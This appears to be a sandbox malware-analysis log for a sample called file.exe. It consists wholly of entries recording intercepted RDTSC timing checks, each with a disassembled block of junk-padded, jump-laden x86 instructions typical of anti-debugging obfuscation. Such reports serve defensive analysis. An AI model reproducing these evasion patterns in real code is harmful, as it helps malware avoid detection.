Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53005B5 second address: 53005D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007F848150386Ah 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 mov dl, ah 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53005D0 second address: 53005D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53005D4 second address: 5300613 instructions: 0x00000000 rdtsc 0x00000002 movsx edx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F848150386Ch 0x00000010 sbb si, D808h 0x00000015 jmp 00007F848150386Bh 0x0000001a popfd 0x0000001b mov si, DE7Fh 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F848150386Ch 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300613 second address: 5300622 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848074392Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300622 second address: 5300628 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300628 second address: 530062C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52E02B0 second address: 52E02B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52E02B4 second address: 52E02D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743939h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52E02D1 second address: 52E0325 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8481503871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F8481503877h 0x00000010 movzx ecx, bx 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 jmp 00007F848150386Bh 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F8481503870h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52E0325 second address: 52E0329 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52E0329 second address: 52E032F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52E032F second address: 52E0340 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F848074392Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52D0E28 second address: 52D0E2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52E012F second address: 52E0135 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52E0135 second address: 52E014F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52E014F second address: 52E0153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52E0153 second address: 52E0159 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52E0159 second address: 52E015F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52E015F second address: 52E0163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52E0163 second address: 52E0187 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743937h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52E0187 second address: 52E018B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52E018B second address: 52E0191 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52E0191 second address: 52E01AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8481503879h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52E01AE second address: 52E01BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52E01BE second address: 52E01C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52E01C2 second address: 52E01D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743932h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52E01D8 second address: 52E01F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b push esi 0x0000000c mov ebx, 16295D16h 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F0D32 second address: 52F0D38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F0D38 second address: 52F0D5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F848150386Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F0D5B second address: 52F0D61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F0D61 second address: 52F0D72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F848150386Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F0D72 second address: 52F0DCE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743931h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F848074392Eh 0x00000012 xchg eax, ecx 0x00000013 jmp 00007F8480743930h 0x00000018 push eax 0x00000019 jmp 00007F848074392Bh 0x0000001e xchg eax, ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F8480743935h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F0DCE second address: 52F0DEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8481503871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [76FA65FCh] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F0DEE second address: 52F0DF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F0DF4 second address: 52F0DFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F0DFA second address: 52F0DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F0DFE second address: 52F0E24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d pushad 0x0000000e push ebx 0x0000000f push eax 0x00000010 pop edi 0x00000011 pop esi 0x00000012 popad 0x00000013 je 00007F84F31363B4h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F0E24 second address: 52F0E28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F0E28 second address: 52F0E2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F0E2E second address: 52F0E44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8480743932h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F0E44 second address: 52F0E95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov si, di 0x00000013 pushfd 0x00000014 jmp 00007F8481503877h 0x00000019 sub cx, 00EEh 0x0000001e jmp 00007F8481503879h 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F0E95 second address: 52F0EEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8480743937h 0x00000009 xor cx, 26FEh 0x0000000e jmp 00007F8480743939h 0x00000013 popfd 0x00000014 push eax 0x00000015 pop edx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xor eax, dword ptr [ebp+08h] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F8480743936h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F0EEF second address: 52F0F70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 mov edi, ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and ecx, 1Fh 0x0000000e jmp 00007F8481503874h 0x00000013 ror eax, cl 0x00000015 pushad 0x00000016 movzx eax, bx 0x00000019 pushfd 0x0000001a jmp 00007F8481503873h 0x0000001f and eax, 70D1A3CEh 0x00000025 jmp 00007F8481503879h 0x0000002a popfd 0x0000002b popad 0x0000002c leave 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007F848150386Ch 0x00000034 or ecx, 0DB50448h 0x0000003a jmp 00007F848150386Bh 0x0000003f popfd 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F0F70 second address: 5300037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, cx 0x00000007 popad 0x00000008 popad 0x00000009 retn 0004h 0x0000000c nop 0x0000000d mov esi, eax 0x0000000f lea eax, dword ptr [ebp-08h] 0x00000012 xor esi, dword ptr [00722014h] 0x00000018 push eax 0x00000019 push eax 0x0000001a push eax 0x0000001b lea eax, dword ptr [ebp-10h] 0x0000001e push eax 0x0000001f call 00007F84853547E2h 0x00000024 push FFFFFFFEh 0x00000026 pushad 0x00000027 mov edi, ecx 0x00000029 jmp 00007F8480743938h 0x0000002e popad 0x0000002f pop eax 0x00000030 jmp 00007F8480743930h 0x00000035 ret 0x00000036 nop 0x00000037 push eax 0x00000038 call 00007F848536385Fh 0x0000003d mov edi, edi 0x0000003f jmp 00007F8480743930h 0x00000044 xchg eax, ebp 0x00000045 jmp 00007F8480743930h 0x0000004a push eax 0x0000004b jmp 00007F848074392Bh 0x00000050 xchg eax, ebp 0x00000051 pushad 0x00000052 push eax 0x00000053 push edx 0x00000054 mov si, 16F1h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300037 second address: 5300071 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ax, 53F3h 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007F8481503871h 0x00000016 sbb ecx, 07740436h 0x0000001c jmp 00007F8481503871h 0x00000021 popfd 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5300071 second address: 53000AE instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8480743930h 0x00000008 adc al, 00000058h 0x0000000b jmp 00007F848074392Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F8480743935h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B000A second address: 52B0032 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8481503877h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0032 second address: 52B009C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 movsx ebx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F8480743933h 0x00000013 xor ax, 790Eh 0x00000018 jmp 00007F8480743939h 0x0000001d popfd 0x0000001e mov di, cx 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 jmp 00007F848074392Ah 0x00000028 mov ebp, esp 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F8480743937h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B009C second address: 52B00B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8481503874h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B00B4 second address: 52B00F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848074392Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and esp, FFFFFFF8h 0x0000000e pushad 0x0000000f mov al, AEh 0x00000011 push edx 0x00000012 mov dl, ah 0x00000014 pop edi 0x00000015 popad 0x00000016 xchg eax, ecx 0x00000017 pushad 0x00000018 mov cx, 9651h 0x0000001c mov cx, 468Dh 0x00000020 popad 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F8480743936h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B00F4 second address: 52B00FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B00FA second address: 52B0116 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848074392Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov esi, 23734AD9h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0116 second address: 52B0167 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8481503876h 0x00000008 sub cl, 00000068h 0x0000000b jmp 00007F848150386Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov di, si 0x00000016 popad 0x00000017 xchg eax, ebx 0x00000018 pushad 0x00000019 push ebx 0x0000001a mov ch, F3h 0x0000001c pop ebx 0x0000001d popad 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F8481503877h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0167 second address: 52B016D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B016D second address: 52B0173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0173 second address: 52B0177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0177 second address: 52B017B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B017B second address: 52B019F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8480743939h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B019F second address: 52B01A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B01A5 second address: 52B01A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B01A9 second address: 52B01BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B01BA second address: 52B01BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B01BE second address: 52B01C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B01C2 second address: 52B01C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B01C8 second address: 52B01CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B01CE second address: 52B01D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B01D2 second address: 52B0209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a mov edx, esi 0x0000000c mov dx, si 0x0000000f popad 0x00000010 mov dword ptr [esp], esi 0x00000013 pushad 0x00000014 movzx ecx, di 0x00000017 jmp 00007F848150386Dh 0x0000001c popad 0x0000001d mov esi, dword ptr [ebp+08h] 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F848150386Dh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0209 second address: 52B026A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8480743937h 0x00000009 add eax, 66CC223Eh 0x0000000f jmp 00007F8480743939h 0x00000014 popfd 0x00000015 mov esi, 36AD4987h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, edi 0x0000001e jmp 00007F848074392Ah 0x00000023 push eax 0x00000024 jmp 00007F848074392Bh 0x00000029 xchg eax, edi 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B026A second address: 52B026E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B026E second address: 52B0274 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0274 second address: 52B02C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, bx 0x00000006 mov ax, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c test esi, esi 0x0000000e pushad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 jmp 00007F8481503874h 0x00000018 popad 0x00000019 je 00007F84F3171BDFh 0x0000001f jmp 00007F8481503870h 0x00000024 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F848150386Ah 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B02C7 second address: 52B02CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B02CD second address: 52B0329 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F84F3171BB2h 0x0000000f pushad 0x00000010 pushad 0x00000011 mov cx, C6A3h 0x00000015 mov edx, eax 0x00000017 popad 0x00000018 call 00007F8481503874h 0x0000001d pushad 0x0000001e popad 0x0000001f pop esi 0x00000020 popad 0x00000021 mov edx, dword ptr [esi+44h] 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 jmp 00007F8481503878h 0x0000002c mov ax, E0E1h 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0329 second address: 52B034D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743937h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B034D second address: 52B0351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0351 second address: 52B0357 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0357 second address: 52B03BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F8481503878h 0x00000008 pop ecx 0x00000009 movsx ebx, si 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f test edx, 61000000h 0x00000015 jmp 00007F848150386Ah 0x0000001a jne 00007F84F3171B65h 0x00000020 jmp 00007F8481503870h 0x00000025 test byte ptr [esi+48h], 00000001h 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F8481503877h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0831 second address: 52A0880 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8480743939h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov cx, A029h 0x00000011 pushfd 0x00000012 jmp 00007F8480743936h 0x00000017 sub ecx, 199D79F8h 0x0000001d jmp 00007F848074392Bh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0880 second address: 52A0886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0886 second address: 52A088A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A088A second address: 52A08D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F848150386Bh 0x00000015 add ax, EA6Eh 0x0000001a jmp 00007F8481503879h 0x0000001f popfd 0x00000020 mov eax, 2D75BFF7h 0x00000025 popad 0x00000026 rdtsc
